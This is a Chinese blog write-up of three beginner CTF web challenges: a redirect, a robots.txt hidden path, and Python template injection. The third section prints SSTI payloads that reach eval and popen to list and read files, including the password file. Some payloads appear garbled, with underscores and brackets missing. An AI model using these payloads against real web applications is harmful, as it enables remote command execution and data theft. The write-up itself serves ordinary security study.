攻防世界高手区1-3

最新推荐文章于 2024-07-24 10:28:34 发布
最新推荐文章于 2024-07-24 10:28:34 发布
阅读量271 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/originalSinLow/article/details/107563894
版权

文章目录

第一题 baby web

题目描述写道初始页面,想到写网站的第一步都是index.php
于是修改当前URL 将1.php修改为index.php
回车后却发现页面URL仍为1.php
于是审查元素在网络里发现重定向302,点开后找到flag

第二题 Training-WWW-Robots

翻译页面发现“在这个小小的培训挑战中,您将学习Robots_exclusion_standard。
网络搜寻器使用robots.txt文件检查是否允许他们对您的网站或网站的一部分进行爬网和编制索引。
有时,这些文件显示目录结构,而不是防止内容被爬网。”
在这里插入图片描述简单搜索后发现每个网站根目录都有一个robots.txt,告诉我们可以访问的站点和不可以访问的站点,但它只是相当于一个标识,在我们访问robots.txt后,在这里插入图片描述发现标识为不可访问的站点f10g.php,访问后得到flag

第三题 Web_python_template_injection

查看题目考python模板注入

搜索后发现常用的四个命令

1.{{算术表达式}}
2.{{config.items()}} 可以查看服务器的配置信息
3.{{[].class.base.subclasses()40.read()}} 读取password信息
4.{% for c in [].class.base.subclasses() %}
{% if c.name == ‘catch_warnings’ %}
{% for b in c.init.globals.values() %}
{% if b.class == {}.class %} //遍历基类 找到eval函数
{% if ‘eval’ in b.keys() %} //找到了
{{ b’eval’ }} //导入cmd 执行popen里的命令 read读出数据
//其中ls命令是显示列表,切换为cat fl4g即为读取文件
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}

测试发现确实为SSTI
在这里插入图片描述直接调用第四条命令
在这里插入图片描述

幻无邪_zxy
关注
【网络安全 | CTF】攻防世界 Training-WWW-Robots 解题详析
等风来
05-20 3564
在这个小训练挑战中,你将学习 Robots_exclusion_standard(机器人排除标准)。robots.txt 文件是由网络爬虫用来检查是否允许他们爬行和索引你的网站或仅部分内容。
攻防世界杂项高手3-11解题(详细)
qq_53105813的博客
07-01 747
攻防世界wp
Robots协议 :Robots Exclusion Standard(网络爬虫排除标准)
The limits of your knowledge are the limits of your world
03-15 904
说明Robots协议全称(网络爬虫排除标准)作用网站告知网路爬虫哪些页面可以抓取,哪些不行【类人行为,可以不遵守】形式网站根目录下放置robots.txt文件使用自动或人工识别robots.txt文件,再进行内容爬取约束性Robots协议是建议性非约束性,可以不遵守,但存在法律风险。
机器人排除标准 robot.txt robot exclusion standard
weixin_34117522的博客
12-09 440
18.2 什么是机器人排除标准 《搜索引擎优化宝典(第2版)》第18章机器人、蜘蛛和爬虫,本章主要的内容有:什么是机器人、爬虫和蜘蛛;什么是机器人排除标准; Robots 元标签;用XML 网站地图使网页被收录。本节为大家介绍什么是机器人排除标准虫。 作者:马煜 译来源:清华大学出版社|2010-07-19 21:40  移动端  收藏   分享 开发者大赛路演 | 12月16日,技术创新,北...
攻防世界CTF|web方向】第一题:Training-WWW-Robots
最新发布
weixin_70825534的博客
07-24 443
如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。1.做题技巧层面:有时flag会出现一些相似的变形,比如这道题中的fl0g,不要忽视了。如果您希望搜索引擎收录网站上所有内容,请勿建立 robots.txt文件。3.尝试访问:本题目场景的网页下的robots.txt文件,得到如下界面。,如同守门人无法阻止窃贼等恶意闯入者,是一个类似于君子协议的文件。形式:在网站根目录下的robots.txt文件。的内容时,才需要使用。
攻防世界Web(难度1)
weixin_59453707的博客
08-30 472
将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串将字符串转换为状态信息PHP内的几个特殊魔术方法__construct():当对象创建(new)时会自动调用,但在unserialize()时是不会自动调用的(构造函数)__destruct():当对象操作执行完毕后自动执行destruct()函数的代码。...
攻防世界 Misc高手进阶 3分题 2-1
闵行小鱼塘
11-14 1090
继续ctf的旅程,攻防世界Misc高手进阶的3分题,本篇是2-1的writeup
攻防世界杂项高手进阶--hit-the-core
weixin_47717433的博客
01-16 571
hit-the-core 知识储备: core文件 linux下的core文件 strings命令 一级目录 二级目录 三级目录
攻防世界 Misc高手进阶 3分题 3-11
闵行小鱼塘
11-15 1123
继续ctf的旅程,攻防世界Misc高手进阶的3分题,本篇是3-11的writeup
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1070
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
CTF Training-WWW-Robots
热门推荐
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:31059 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入以下界面 2、翻译 看到上面的信息,会想到君子协议 robots.txt; 3、URL为http://220.249.52.133:31059/robots.txt(在最后直接加上“/robots.txt”)—>回车 4、这是URL为http://220.249.52.133:31059/fl0g.php—>回车 5、OK cyberpeace{c598a5
CTF解题
m0_74097148的博客
11-29 1189
第三题:点击链接后一脸懵,但我看到题目提示肯定用php,于是我加了后缀index.php发现没啥变化,于是就不会了,看了一些大佬的提示,有的是扫目录或者是不断在php后面加后缀,于是得到了index.phps发现出现了一些代码,查看网页源代码进行审计。该代码的意思时不能将id的值通过get传给admin,但必须让admin等于get传值,又由于传得值会经过url解码,(我又得知浏览器会对写入的东西进行一次url解码),因此必须传值的时候进行两次url编码才可以,即对admin进行两次url编码即可。
Robots-网络爬虫排除标准协议
mmqgirlfriend的博客
06-14 676
Robots Exclusion Standard 网络爬虫排除标准 作用:网站告知爬虫哪些页面可以抓取,哪些不行 形式:在网站根目录下的robots.txt文件 案例:京东的robots协议 https://www.jd.com/robots.txt Robosts协议的基本语法: *代表所有 /代表根目录 其他网站的robots协议 robots协议的遵守方方式 网络爬虫:自动或人工识别robots.txt文件,再进行内容爬取 约束性:robots协议是建议但非约束性,网络爬虫可以不遵守,但存在法律
拒绝蜘蛛协议(Robots Exclusion Protocol)
风声
11-01 4233
(一)Robots Exclusion Protocol协议简介   当Robot访问一个Web站点时,比如http://www.some.com/,它先去检查文件http://www.some.com/robots.txt。如果这个文件存在,它便会按照这样的记录格式去分析:  User-agent:*Disallow: /cgi-bin/Disallow: /tmp/Disallow: /~
Training: WWW-Robots (HTTP, Training)
Howie‘s Blog
07-06 1647
Training: WWW-Robots (HTTP, Training) 题目描述 In this little training challenge, you are going to learn about the Robots_exclusion_standard. The robots.txt file is used by web crawlers to check if they ...
wechall: Training: WWW-Robots (HTTP, Training) Web入门初试
Yannie's Blog
06-02 659
今天下午一度很迷茫。。。一是看了研究生院老师的研究方向,另一个是衡量了一下自己目前的水平,心里真的不免倒吸一口冷气。。。更加担忧的是三年之后,自己仍在ACM与CTF之间徘徊,然后没有那些本科就工作的同学们成长的快(无论是技术还是薪资上) 由于大三的时候有及短暂的呆过院的ctf队,和一个搞Web的同学关系还可以,看到其在朋友圈发了自己的offer,想了想他平时是乐于助人的那一种,就赶紧虚心求教,希望指点一二,不至于自己三年之后再次面临毕业即失业的尴尬场景。 由于本科自己是真的心气太高,干啥事总想搞最难的那种,
wechall做题之www-robots
weixin_43700692的博客
06-24 822
wechall之 www-robots
4.Wechall-------------Training: WWW-Robots by Gizmore(得分1个)
qwsn
10-23 1906
0x01:题目 题目 题目链接地址 WWW-Robots http://www.wechall.net/challenge/training/www/robots/index.php 0x02:WR 提示 解题步骤 In this little training challenge, you are going to learn about the Ro...
攻防世界misc Training-Stegano-1
10-02
攻防世界Training-Stegano-1是一道隐写题。在这个题目中,给出了一个经过Base64编码的字符串ZmxhZ3tsNURHcUYxcFB6T2IyTFU5MTlMTWFCWVM1QjFHMDFGRH0=。解码这个字符串可以得到flag。这个题目涉及到了高级加密标准...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值